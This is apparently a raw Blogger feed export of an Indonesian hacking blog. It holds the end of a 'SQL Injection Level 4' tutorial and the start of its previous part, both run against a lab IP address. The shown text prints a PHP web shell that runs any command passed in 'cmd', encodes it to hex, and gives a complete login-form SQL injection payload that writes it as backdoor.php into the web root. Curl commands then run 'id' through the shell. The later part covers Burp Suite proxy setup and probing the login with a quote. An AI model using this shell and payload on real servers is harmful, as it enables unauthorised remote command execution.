auto;"&gt;&lt;span style="color: lime; font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;b&gt;?&amp;gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;Kemudian saya sedikit modifikasi menjadi.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;span style="line-height: 18px;"&gt;if(isset($_REQUEST['cmd'])){&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; echo "&amp;lt;pre&amp;gt;";&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $cmd = ($_REQUEST['cmd']);&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; system($cmd);&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; echo "&amp;lt;/pre&amp;gt;";&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; die;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;span style="line-height: 18px;"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;span style="line-height: 18px;"&gt;?&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;2. Encoding ASCII to HEX with Burpsuite&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Mengetahui shell code kita harus berformat hexadecimal, maka kita harus melakukan converting dari ASCII ke HEX. Burpsuite telah menyediakan fitur ini. Klik tab decoder, kemudian pada drop down menu "encode as..." pilih "ascii hex". Pada text menu (atas), masukan shell code anda. Kali ini saya menggunakan shell code milik saya, dan shell code saya telah dikonfersikan ke HEX pada text menu bagian bawah.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: 'Courier New',Courier,monospace;"&gt;&lt;b&gt;3c3f7068700a0a696628697373657428245f524551554553545b27636d64275d29297b0a20202020202020206563686f20223c7072653e223b0a202020202020202024636d64203d2028245f524551554553545b27636d64275d293b0a202020202020202073797374656d2824636d64293b0a20202020202020206563686f20223c2f7072653e223b0a20202020202020206469653b0a7d0a0a3f3e&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-PUsS1F2fVpI/T4ZmvL3XOmI/AAAAAAAABVw/HIJVQxZaFQU/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-PUsS1F2fVpI/T4ZmvL3XOmI/AAAAAAAABVw/HIJVQxZaFQU/s320/9.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;3. Burpsuite In Action&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Kita telah mengubah shell code manjadi HEX format, selanjutnya kita masukan perintah SQL, sehingga perintah SQL menjadi&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: 'Courier New',Courier,monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;myusername=admin&amp;amp;mypassword=' AND 1=1 union select 0x20,0x20,0x20 INTO OUTFILE '/var/www/backdoor.php' LINES TERMINATED BY 0x3c3f7068700a0a696628697373657428245f524551554553545b27636d64275d29297b0a20202020202020206563686f20223c7072653e223b0a202020202020202024636d64203d2028245f524551554553545b27636d64275d293b0a202020202020202073797374656d2824636d64293b0a20202020202020206563686f20223c2f7072653e223b0a20202020202020206469653b0a7d0a0a3f3e -- &amp;amp;Submit=Login&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-dih7GGlPfms/T4ZnfffuQPI/AAAAAAAABV4/O8lMhHXwW2g/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-dih7GGlPfms/T4ZnfffuQPI/AAAAAAAABV4/O8lMhHXwW2g/s320/10.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Jangan klik tombol GO. Sebelumnya saya akan membuktikan bahwa belum ada file backdoor.php di dalam web server. Saya akan mengujinya dengan perintah curl.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; color: white; font-family: 'Courier New', Courier, FreeMono, monospace; line-height: 18px; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;red-dragon&amp;nbsp;&lt;/span&gt;[~]&lt;span style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: yellow;"&gt;&amp;gt;&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="background-color: black;"&gt;&lt;span style="color: lime; font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;b&gt;curl http://172.16.33.131/backdoor.php&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Hasil.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;red-dragon&amp;nbsp;&lt;/span&gt;[~]&lt;span style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: yellow;"&gt;&amp;gt;&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="background-color: black;"&gt;&lt;span style="color: lime; font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;b&gt;curl http://172.16.33.131/backdoor.php&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="font-family: 'Courier New',Courier,monospace;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&amp;lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&amp;gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime;"&gt;&amp;lt;title&amp;gt;&lt;/span&gt;&lt;span style="color: red;"&gt;404 Not Found&lt;/span&gt;&lt;span style="color: lime;"&gt;&amp;lt;/title&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&amp;lt;h1&amp;gt;Not Found&amp;lt;/h1&amp;gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime;"&gt;&amp;lt;p&amp;gt;&lt;/span&gt;&lt;span style="color: red;"&gt;The requested URL /backdoor.php was not found on this server.&lt;/span&gt;&lt;span style="color: lime;"&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&amp;lt;hr&amp;gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&amp;lt;address&amp;gt;Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch Server at 172.16.33.131 Port 80&amp;lt;/address&amp;gt;&lt;/code&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-rvaoQwRswzE/T4ZoFDRwb9I/AAAAAAAABWA/URquEClGo78/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="168" src="http://2.bp.blogspot.com/-rvaoQwRswzE/T4ZoFDRwb9I/AAAAAAAABWA/URquEClGo78/s320/8.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;4. Access Backdoor&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Kembali ke burpsuite, kemudian tekan tombol GO. Dan kita cek lagi keberadaan backdoor.php pada server.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;red-dragon&amp;nbsp;&lt;/span&gt;[~]&lt;span style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: yellow;"&gt;&amp;gt;&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="background-color: black;"&gt;&lt;span style="color: lime; font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;b&gt;curl http://172.16.33.131/backdoor.php?cmd=id&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-ssFiNvOwnQA/T4ZmY_qENTI/AAAAAAAABVo/AhWwFv2E-vA/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="168" src="http://4.bp.blogspot.com/-ssFiNvOwnQA/T4ZmY_qENTI/AAAAAAAABVo/AhWwFv2E-vA/s320/11.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;It's easy, as usual.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;created by : &lt;span style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="font-family: monospace;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-8977134999383392434?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/04/sql-injection-level-4-part-3.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-PUsS1F2fVpI/T4ZmvL3XOmI/AAAAAAAABVw/HIJVQxZaFQU/s72-c/9.png' height='72' width='72'/><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-548681607815599306</guid><pubDate>Thu, 12 Apr 2012 00:50:00 +0000</pubDate><atom:updated>2012-04-12T07:54:29.966+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>SQL Injection</category><category domain='http://www.blogger.com/atom/ns#'>burpsuite</category><title>SQL Injection Level 4 [Part 2]</title><description>Pada postingan sebelumnya, kita telah membahas tentang melakukan SQL Injeksi Tahap 4 menggunakan SQLmap, dan Tamper Data. Kali ini saya akan melakukan hal yang berbeda dari tutorial SQL Injeksi manapun, karena saya menggunakan tools OWASP Burpsuite.&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Target saya masih sama dari target pada postingan sebelumnya, dengan alasan yang sama, saya tidak mau membuat kerusakan pada situs milik orang lain.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;IP target : 172.16.33.131&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-rj9UsfCYujI/T4YftIo0UYI/AAAAAAAABSo/aXuC-bxVGzQ/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="211" src="http://3.bp.blogspot.com/-rj9UsfCYujI/T4YftIo0UYI/AAAAAAAABSo/aXuC-bxVGzQ/s320/1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Important!!!&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Tutorial ini bertujuan sebagai pembelajaran, penyalah gunaan yang membuat kerugian terhadap pihak lain di luar tanggung jawab penulis.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Preparation :&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;Browser&lt;/li&gt;&lt;li&gt;Burpsuite&lt;i&gt;&lt;span style="color: lime;"&gt; (dapat ditemukan di backtrack 5)&lt;/span&gt;&lt;/i&gt;&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;Walkthrough :&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;1. Menyiapkan burpsuite&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Burpsuite dapat ditemukan di backtrack 5. Pada start menu, pilih &lt;i&gt;&lt;span style="color: lime;"&gt;Applications - Backtrack -&amp;nbsp;Vulnerability&amp;nbsp;Assessment - Web Application Assessment - Web Application Proxies - Burpsuite&lt;/span&gt;&lt;/i&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-E2JaizHdXhY/T4YgAXZmJII/AAAAAAAABSw/P-aKvXSYWLs/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-E2JaizHdXhY/T4YgAXZmJII/AAAAAAAABSw/P-aKvXSYWLs/s320/2.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Burpsuite akan menangkap setiap paket atau data yang dikirim dari client ke server, dengan syarat client harus menggunakan proxy burpsuite. Untuk melakukan pengaturan proxy, lakukan langkah berikut:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Klik tab Proxy&lt;/li&gt;&lt;li&gt;Pada tab intercept, &amp;nbsp;klik "Intercept is on" sehingga menjadi "Intercept is off"&lt;/li&gt;&lt;li&gt;Pada tab options, perhatikan port burpsuite yang aktif. Kali ini saya menggunakan pengaturan umum, yaitu 8080.&lt;/li&gt;&lt;li&gt;Klik tab Target, pada tab ini semua data dan packet akan muncul.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;Jangan tutup burpsuite, karena kita masih menggunakan tool ini.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;2. Menyiapkan Browser&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Anda bisa menggunakan browser apapun, namun dalam tutorial ini, saya menggunakan browser Mozilla Firefox. Untuk melakukan pengaturan proxy, lakukan langkah berikut:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Edit&lt;/li&gt;&lt;li&gt;Preferences&lt;/li&gt;&lt;li&gt;Advanced&lt;/li&gt;&lt;li&gt;Network&lt;/li&gt;&lt;li&gt;Settings&lt;/li&gt;&lt;li&gt;Pilih Manual Proxy Configuration&lt;/li&gt;&lt;li&gt;Pada http proxy, masukan 0.0.0.0&lt;/li&gt;&lt;li&gt;Para port proxy masukan 8080&lt;/li&gt;&lt;li&gt;Klik OK&lt;/li&gt;&lt;/ul&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-T8hodeTJSxc/T4YiZoNumLI/AAAAAAAABS4/jC4Ne5VtGb8/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="285" src="http://1.bp.blogspot.com/-T8hodeTJSxc/T4YiZoNumLI/AAAAAAAABS4/jC4Ne5VtGb8/s320/3.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;3. Burpsuite Intercepting&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Sekarang masukan IP&amp;nbsp;172.16.33.131 pada address bar. Kemudian login dengan&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Username : admin&lt;/div&gt;&lt;div&gt;Password : '&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Klik Login. Kemudian kembali pada burpsuite, maka akan muncul data yang berhasil dihadang (intercepted) oleh burpsuite.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-tt7Lti70920/T4Yi14WrzEI/AAAAAAAABTA/ytIiYhummik/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-tt7Lti70920/T4Yi14WrzEI/AAAAAAAABTA/ytIiYhummik/s320/4.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;4. Burpsuite In Action&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pada pembahasan sebelumnya, kita telah mengetahui, bahwa vulnerability terletak pada halaman checklogin.php. Jika anda masih bingung mengapa halaman ini memiliki vulnerability, saya sarankan anda membaca postingan sebelumnya mengenai&amp;nbsp;&lt;a href="http://www.root-bt.co.cc/2012/04/sql-injection-level-4-part-1.html" target="_blank"&gt;SQL Injection Level 4 [Part 1]&lt;/a&gt;. &amp;nbsp;Klik kanan pada bagian /checklogin.php, kemudian pilih "send to repeater".&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-FCHpl6cXByw/T4YjlwSpHUI/AAAAAAAABUI/LcEZwSnPFoI/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-FCHpl6cXByw/T4YjlwSpHUI/AAAAAAAABUI/LcEZwSnPFoI/s320/5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pada tab repeater. Perhatikan bagian&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: lime;"&gt;myusername=admin&amp;amp;mypassword='&amp;amp;Submit=Login&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pada pembahasan sebelumnya, kita juga sudah mengetahui bahwa parameter "mypassword" memiliki vulnerability terhadap serangan SQL Injection. Ini terlihat dari pesan:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: red;"&gt;mysql_num_rows(): supplied argument is not a valid MySQL result resource in&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br 